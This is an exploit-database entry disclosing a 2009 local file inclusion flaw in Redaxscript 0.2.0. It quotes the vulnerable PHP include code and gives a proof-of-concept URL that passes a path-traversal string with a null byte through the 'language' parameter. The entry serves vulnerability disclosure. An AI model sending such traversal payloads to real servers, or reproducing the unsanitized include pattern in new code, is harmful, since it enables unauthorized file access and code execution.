header-logo
Suggest Exploit
vendor:
Redaxscript
by:
SirGod
7,5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: Redaxscript
Affected Version From: 0.2.0
Affected Version To: 0.2.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Redaxscript 0.2.0 (index.php language) Local File Inclusion Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'language' parameter to the 'index.php' script. A remote attacker can include a file from local resources and execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

##################################################################################
[+] Redaxscript 0.2.0 (index.php language) Local File Inclusion Vulnerability
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##################################################################################

[+] Local File Inclusion

  index.php :

-----------------------------------------------------------------
include('template/'.$_SESSION[_root.'template'].'/index.php');
-----------------------------------------------------------------

  function.php :

-----------------------------------------------------------------
if($_GET['language']) {
		$_SESSION[_root.'language'] = $_GET['language'];
-----------------------------------------------------------------

 - PoC :

    http://127.0.0.1/index.php?language=../../../../../BOOTSECT.BAK%00

##################################################################################

# milw0rm.com [2009-04-10]